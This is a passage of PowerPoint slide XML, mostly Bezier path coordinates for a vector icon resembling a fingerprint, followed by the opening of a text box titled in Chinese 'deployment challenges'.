                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17625" y="19905"/>
                  <a:pt x="17805" y="19790"/>
                  <a:pt x="17824" y="19638"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17843" y="19478"/>
                  <a:pt x="17675" y="19337"/>
                  <a:pt x="17446" y="19324"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12958" y="19058"/>
                  <a:pt x="10388" y="17870"/>
                  <a:pt x="7911" y="16167"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5979" y="14839"/>
                  <a:pt x="4273" y="12450"/>
                  <a:pt x="3800" y="10999"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3510" y="10111"/>
                  <a:pt x="3049" y="7859"/>
                  <a:pt x="5033" y="6110"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5856" y="5384"/>
                  <a:pt x="6750" y="4926"/>
                  <a:pt x="7847" y="4668"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8064" y="4617"/>
                  <a:pt x="8183" y="4452"/>
                  <a:pt x="8110" y="4300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8055" y="4185"/>
                  <a:pt x="7909" y="4110"/>
                  <a:pt x="7747" y="4101"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10497" y="5117"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9985" y="5127"/>
                  <a:pt x="9469" y="5180"/>
                  <a:pt x="8963" y="5279"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7537" y="5556"/>
                  <a:pt x="6334" y="6162"/>
                  <a:pt x="5579" y="6987"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4716" y="7928"/>
                  <a:pt x="4459" y="9116"/>
                  <a:pt x="4837" y="10425"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5102" y="11342"/>
                  <a:pt x="5659" y="12347"/>
                  <a:pt x="6402" y="13254"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6479" y="13348"/>
                  <a:pt x="6618" y="13400"/>
                  <a:pt x="6762" y="13400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6833" y="13400"/>
                  <a:pt x="6903" y="13388"/>
                  <a:pt x="6968" y="13362"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7167" y="13282"/>
                  <a:pt x="7236" y="13103"/>
                  <a:pt x="7122" y="12964"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6432" y="12122"/>
                  <a:pt x="5897" y="11155"/>
                  <a:pt x="5653" y="10310"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4890" y="7666"/>
                  <a:pt x="7078" y="6250"/>
                  <a:pt x="9184" y="5841"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12083" y="5277"/>
                  <a:pt x="14296" y="6355"/>
                  <a:pt x="14983" y="7710"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15376" y="8486"/>
                  <a:pt x="15321" y="9279"/>
                  <a:pt x="15206" y="9807"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15171" y="9967"/>
                  <a:pt x="15326" y="10115"/>
                  <a:pt x="15553" y="10140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15780" y="10164"/>
                  <a:pt x="15993" y="10055"/>
                  <a:pt x="16027" y="9896"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16156" y="9302"/>
                  <a:pt x="16215" y="8405"/>
                  <a:pt x="15764" y="7515"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15274" y="6547"/>
                  <a:pt x="14301" y="5825"/>
                  <a:pt x="12950" y="5428"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12187" y="5204"/>
                  <a:pt x="11348" y="5100"/>
                  <a:pt x="10497" y="5117"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10248" y="6470"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9713" y="6493"/>
                  <a:pt x="9194" y="6588"/>
                  <a:pt x="8722" y="6755"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7320" y="7253"/>
                  <a:pt x="6114" y="8504"/>
                  <a:pt x="6936" y="10524"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8635" y="14696"/>
                  <a:pt x="12975" y="16231"/>
                  <a:pt x="13159" y="16294"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13218" y="16314"/>
                  <a:pt x="13281" y="16326"/>
                  <a:pt x="13343" y="16326"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13496" y="16326"/>
                  <a:pt x="13642" y="16265"/>
                  <a:pt x="13715" y="16162"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13816" y="16018"/>
                  <a:pt x="13732" y="15844"/>
                  <a:pt x="13526" y="15772"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13516" y="15769"/>
                  <a:pt x="12465" y="15398"/>
                  <a:pt x="11231" y="14548"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10096" y="13767"/>
                  <a:pt x="8569" y="12407"/>
                  <a:pt x="7737" y="10364"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7157" y="8938"/>
                  <a:pt x="7664" y="7783"/>
                  <a:pt x="9097" y="7275"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10284" y="6854"/>
                  <a:pt x="12161" y="6945"/>
                  <a:pt x="13479" y="8138"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13620" y="8265"/>
                  <a:pt x="13880" y="8289"/>
                  <a:pt x="14062" y="8190"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14244" y="8091"/>
                  <a:pt x="14277" y="7909"/>
                  <a:pt x="14137" y="7781"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13443" y="7154"/>
                  <a:pt x="12536" y="6728"/>
                  <a:pt x="11514" y="6552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11273" y="6510"/>
                  <a:pt x="11031" y="6484"/>
                  <a:pt x="10789" y="6472"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10608" y="6463"/>
                  <a:pt x="10427" y="6463"/>
                  <a:pt x="10248" y="6470"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1512" y="6625"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1351" y="6634"/>
                  <a:pt x="1203" y="6710"/>
                  <a:pt x="1150" y="6825"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="839" y="7491"/>
                  <a:pt x="639" y="8405"/>
                  <a:pt x="639" y="9153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="639" y="9314"/>
                  <a:pt x="826" y="9444"/>
                  <a:pt x="1055" y="9444"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1285" y="9444"/>
                  <a:pt x="1470" y="9314"/>
                  <a:pt x="1470" y="9153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1470" y="8461"/>
                  <a:pt x="1656" y="7618"/>
                  <a:pt x="1941" y="7006"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2012" y="6853"/>
                  <a:pt x="1894" y="6687"/>
                  <a:pt x="1676" y="6637"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1621" y="6625"/>
                  <a:pt x="1566" y="6622"/>
                  <a:pt x="1512" y="6625"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11102" y="7922"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10771" y="7915"/>
                  <a:pt x="10417" y="7967"/>
                  <a:pt x="10042" y="8101"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8587" y="8624"/>
                  <a:pt x="8194" y="9727"/>
                  <a:pt x="8993" y="11053"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9788" y="12373"/>
                  <a:pt x="11391" y="13857"/>
                  <a:pt x="12891" y="14663"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15646" y="16143"/>
                  <a:pt x="19243" y="16329"/>
                  <a:pt x="19394" y="16336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19404" y="16336"/>
                  <a:pt x="19412" y="16336"/>
                  <a:pt x="19422" y="16336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19638" y="16336"/>
                  <a:pt x="19821" y="16219"/>
                  <a:pt x="19836" y="16065"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19851" y="15904"/>
                  <a:pt x="19678" y="15764"/>
                  <a:pt x="19449" y="15753"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19414" y="15752"/>
                  <a:pt x="15948" y="15571"/>
                  <a:pt x="13397" y="14200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12022" y="13462"/>
                  <a:pt x="10493" y="12042"/>
                  <a:pt x="9760" y="10825"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9140" y="9796"/>
                  <a:pt x="9382" y="8993"/>
                  <a:pt x="10422" y="8620"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10781" y="8491"/>
                  <a:pt x="11732" y="8149"/>
                  <a:pt x="13216" y="9844"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13657" y="10347"/>
                  <a:pt x="14785" y="11410"/>
                  <a:pt x="15342" y="11767"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15512" y="11876"/>
                  <a:pt x="15773" y="11867"/>
                  <a:pt x="15928" y="11748"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16083" y="11630"/>
                  <a:pt x="16072" y="11446"/>
                  <a:pt x="15903" y="11338"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15437" y="11038"/>
                  <a:pt x="14376" y="10055"/>
                  <a:pt x="13926" y="9540"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13547" y="9107"/>
                  <a:pt x="12538" y="7955"/>
                  <a:pt x="11102" y="7922"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="21077" y="8390"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20847" y="8397"/>
                  <a:pt x="20669" y="8534"/>
                  <a:pt x="20680" y="8694"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20740" y="9617"/>
                  <a:pt x="20680" y="10537"/>
                  <a:pt x="20496" y="11506"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20466" y="11666"/>
                  <a:pt x="20626" y="11812"/>
                  <a:pt x="20853" y="11833"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20872" y="11835"/>
                  <a:pt x="20890" y="11835"/>
                  <a:pt x="20908" y="11835"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21113" y="11835"/>
                  <a:pt x="21292" y="11730"/>
                  <a:pt x="21320" y="11583"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21510" y="10579"/>
                  <a:pt x="21573" y="9626"/>
                  <a:pt x="21511" y="8668"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21500" y="8508"/>
                  <a:pt x="21307" y="8385"/>
                  <a:pt x="21077" y="8390"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11308" y="9289"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11114" y="9271"/>
                  <a:pt x="10939" y="9303"/>
                  <a:pt x="10799" y="9347"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10472" y="9448"/>
                  <a:pt x="10334" y="9609"/>
                  <a:pt x="10276" y="9727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10099" y="10088"/>
                  <a:pt x="10395" y="10523"/>
                  <a:pt x="10769" y="11013"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11153" y="11514"/>
                  <a:pt x="12114" y="12574"/>
                  <a:pt x="13280" y="13371"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13445" y="13483"/>
                  <a:pt x="13708" y="13481"/>
                  <a:pt x="13869" y="13366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14029" y="13250"/>
                  <a:pt x="14025" y="13066"/>
                  <a:pt x="13861" y="12953"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12765" y="12204"/>
                  <a:pt x="11838" y="11175"/>
                  <a:pt x="11501" y="10736"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11361" y="10553"/>
                  <a:pt x="10989" y="10066"/>
                  <a:pt x="11062" y="9917"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11064" y="9912"/>
                  <a:pt x="11070" y="9898"/>
                  <a:pt x="11134" y="9879"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11194" y="9860"/>
                  <a:pt x="11223" y="9852"/>
                  <a:pt x="11338" y="9934"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11513" y="10060"/>
                  <a:pt x="11726" y="10312"/>
                  <a:pt x="11975" y="10604"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12508" y="11228"/>
                  <a:pt x="13501" y="12390"/>
                  <a:pt x="15439" y="13160"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17682" y="14052"/>
                  <a:pt x="20201" y="14171"/>
                  <a:pt x="20307" y="14176"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20316" y="14176"/>
                  <a:pt x="20326" y="14176"/>
                  <a:pt x="20335" y="14176"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20552" y="14176"/>
                  <a:pt x="20735" y="14057"/>
                  <a:pt x="20749" y="13903"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20763" y="13742"/>
                  <a:pt x="20588" y="13604"/>
                  <a:pt x="20359" y="13593"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20335" y="13592"/>
                  <a:pt x="17920" y="13476"/>
                  <a:pt x="15849" y="12653"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14101" y="11958"/>
                  <a:pt x="13183" y="10883"/>
                  <a:pt x="12690" y="10305"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12403" y="9968"/>
                  <a:pt x="12175" y="9700"/>
                  <a:pt x="11931" y="9526"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11717" y="9373"/>
                  <a:pt x="11502" y="9307"/>
                  <a:pt x="11308" y="9289"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1214" y="10075"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="985" y="10089"/>
                  <a:pt x="817" y="10231"/>
                  <a:pt x="837" y="10392"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="997" y="11678"/>
                  <a:pt x="2204" y="14433"/>
                  <a:pt x="3968" y="16049"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4762" y="16776"/>
                  <a:pt x="5614" y="17435"/>
                  <a:pt x="6499" y="18009"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6579" y="18061"/>
                  <a:pt x="6681" y="18087"/>
                  <a:pt x="6782" y="18087"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6894" y="18087"/>
                  <a:pt x="7005" y="18055"/>
                  <a:pt x="7087" y="17993"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7243" y="17875"/>
                  <a:pt x="7231" y="17690"/>
                  <a:pt x="7062" y="17581"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6212" y="17030"/>
                  <a:pt x="5393" y="16395"/>
                  <a:pt x="4628" y="15694"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2959" y="14165"/>
                  <a:pt x="1815" y="11559"/>
                  <a:pt x="1663" y="10341"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1643" y="10181"/>
                  <a:pt x="1443" y="10061"/>
                  <a:pt x="1214" y="10075"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17037" y="11823"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="16875" y="11823"/>
                  <a:pt x="16720" y="11889"/>
                  <a:pt x="16652" y="12000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16563" y="12148"/>
                  <a:pt x="16662" y="12320"/>
                  <a:pt x="16873" y="12383"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18934" y="12996"/>
                  <a:pt x="20622" y="13006"/>
                  <a:pt x="20707" y="13006"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20936" y="13005"/>
                  <a:pt x="21122" y="12874"/>
                  <a:pt x="21121" y="12713"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21121" y="12553"/>
                  <a:pt x="20937" y="12423"/>
                  <a:pt x="20707" y="12423"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20687" y="12423"/>
                  <a:pt x="19112" y="12417"/>
                  <a:pt x="17198" y="11847"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17146" y="11832"/>
                  <a:pt x="17091" y="11823"/>
                  <a:pt x="17037" y="11823"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="361" y="12860"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="133" y="12881"/>
                  <a:pt x="-27" y="13027"/>
                  <a:pt x="3" y="13186"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="130" y="13851"/>
                  <a:pt x="640" y="14606"/>
                  <a:pt x="976" y="15105"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1063" y="15235"/>
                  <a:pt x="1138" y="15347"/>
                  <a:pt x="1189" y="15432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1257" y="15543"/>
                  <a:pt x="1410" y="15609"/>
                  <a:pt x="1571" y="15609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1626" y="15609"/>
                  <a:pt x="1682" y="15602"/>
                  <a:pt x="1735" y="15586"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1947" y="15523"/>
                  <a:pt x="2043" y="15352"/>
                  <a:pt x="1954" y="15204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1896" y="15108"/>
                  <a:pt x="1819" y="14991"/>
                  <a:pt x="1728" y="14856"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1414" y="14390"/>
                  <a:pt x="939" y="13685"/>
                  <a:pt x="830" y="13110"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="799" y="12950"/>
                  <a:pt x="588" y="12838"/>
                  <a:pt x="361" y="12860"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15129" y="13701"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="14967" y="13694"/>
                  <a:pt x="14807" y="13753"/>
                  <a:pt x="14730" y="13861"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14627" y="14005"/>
                  <a:pt x="14711" y="14180"/>
                  <a:pt x="14916" y="14253"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17269" y="15080"/>
                  <a:pt x="19720" y="15239"/>
                  <a:pt x="19824" y="15246"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19836" y="15246"/>
                  <a:pt x="19849" y="15247"/>
                  <a:pt x="19861" y="15247"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20074" y="15247"/>
                  <a:pt x="20254" y="15133"/>
                  <a:pt x="20273" y="14981"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20293" y="14821"/>
                  <a:pt x="20124" y="14679"/>
                  <a:pt x="19895" y="14665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19872" y="14663"/>
                  <a:pt x="17494" y="14508"/>
                  <a:pt x="15288" y="13733"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15236" y="13714"/>
                  <a:pt x="15183" y="13704"/>
                  <a:pt x="15129" y="13701"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7941" y="14159"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7888" y="14166"/>
                  <a:pt x="7837" y="14180"/>
                  <a:pt x="7789" y="14202"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7599" y="14292"/>
                  <a:pt x="7547" y="14474"/>
                  <a:pt x="7675" y="14607"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8981" y="15969"/>
                  <a:pt x="10833" y="17022"/>
                  <a:pt x="13179" y="17738"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15328" y="18393"/>
                  <a:pt x="17275" y="18577"/>
                  <a:pt x="18243" y="18628"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18254" y="18629"/>
                  <a:pt x="18262" y="18628"/>
                  <a:pt x="18273" y="18628"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18488" y="18628"/>
                  <a:pt x="18671" y="18512"/>
                  <a:pt x="18687" y="18359"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18704" y="18198"/>
                  <a:pt x="18534" y="18058"/>
                  <a:pt x="18305" y="18045"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17568" y="18007"/>
                  <a:pt x="15624" y="17848"/>
                  <a:pt x="13511" y="17204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11313" y="16533"/>
                  <a:pt x="9581" y="15550"/>
                  <a:pt x="8365" y="14282"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8269" y="14182"/>
                  <a:pt x="8100" y="14137"/>
                  <a:pt x="7941" y="14159"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2435" y="16226"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2329" y="16217"/>
                  <a:pt x="2218" y="16236"/>
                  <a:pt x="2127" y="16286"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1946" y="16384"/>
                  <a:pt x="1915" y="16567"/>
                  <a:pt x="2055" y="16694"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4640" y="19029"/>
                  <a:pt x="6844" y="20424"/>
                  <a:pt x="11722" y="21572"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11766" y="21583"/>
                  <a:pt x="11810" y="21588"/>
                  <a:pt x="11854" y="21588"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12027" y="21588"/>
                  <a:pt x="12190" y="21512"/>
                  <a:pt x="12248" y="21390"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12321" y="21237"/>
                  <a:pt x="12205" y="21072"/>
                  <a:pt x="11988" y="21021"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7283" y="19913"/>
                  <a:pt x="5249" y="18627"/>
                  <a:pt x="2713" y="16336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2642" y="16272"/>
                  <a:pt x="2541" y="16236"/>
                  <a:pt x="2435" y="16226"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15586" y="16372"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="15424" y="16378"/>
                  <a:pt x="15275" y="16450"/>
                  <a:pt x="15216" y="16564"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15137" y="16715"/>
                  <a:pt x="15246" y="16882"/>
                  <a:pt x="15461" y="16938"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17305" y="17412"/>
                  <a:pt x="18763" y="17461"/>
                  <a:pt x="18824" y="17463"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18830" y="17463"/>
                  <a:pt x="18837" y="17463"/>
                  <a:pt x="18843" y="17463"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19065" y="17463"/>
                  <a:pt x="19248" y="17341"/>
                  <a:pt x="19258" y="17185"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19268" y="17024"/>
                  <a:pt x="19090" y="16889"/>
                  <a:pt x="18861" y="16882"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18847" y="16882"/>
                  <a:pt x="17473" y="16833"/>
                  <a:pt x="15749" y="16390"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15695" y="16376"/>
                  <a:pt x="15639" y="16371"/>
                  <a:pt x="15586" y="16372"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3038" y="18536"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2932" y="18530"/>
                  <a:pt x="2822" y="18553"/>
                  <a:pt x="2735" y="18605"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2561" y="18710"/>
                  <a:pt x="2539" y="18894"/>
                  <a:pt x="2688" y="19016"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3629" y="19787"/>
                  <a:pt x="4952" y="20590"/>
                  <a:pt x="6224" y="21164"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6293" y="21195"/>
                  <a:pt x="6370" y="21209"/>
                  <a:pt x="6447" y="21209"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6584" y="21209"/>
                  <a:pt x="6718" y="21162"/>
                  <a:pt x="6797" y="21075"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6921" y="20940"/>
                  <a:pt x="6866" y="20760"/>
                  <a:pt x="6673" y="20673"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5741" y="20253"/>
                  <a:pt x="4370" y="19497"/>
                  <a:pt x="3321" y="18637"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3246" y="18576"/>
                  <a:pt x="3144" y="18542"/>
                  <a:pt x="3038" y="18536"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8531" y="18541"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="8427" y="18554"/>
                  <a:pt x="8329" y="18595"/>
                  <a:pt x="8263" y="18661"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8132" y="18793"/>
                  <a:pt x="8179" y="18974"/>
                  <a:pt x="8368" y="19066"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11665" y="20673"/>
                  <a:pt x="15613" y="21036"/>
                  <a:pt x="15779" y="21051"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15797" y="21052"/>
                  <a:pt x="15814" y="21052"/>
                  <a:pt x="15831" y="21052"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16038" y="21052"/>
                  <a:pt x="16217" y="20946"/>
                  <a:pt x="16243" y="20798"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16272" y="20639"/>
                  <a:pt x="16111" y="20492"/>
                  <a:pt x="15883" y="20472"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15845" y="20468"/>
                  <a:pt x="11972" y="20114"/>
                  <a:pt x="8842" y="18588"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8747" y="18542"/>
                  <a:pt x="8636" y="18528"/>
                  <a:pt x="8531" y="18541"/>
                </a:cubicBez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2" name="部署挑战…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3751650" y="2730500"/>
            <a:ext cx="55015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463422" indent="-463422" algn="l" defTabSz="519937">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
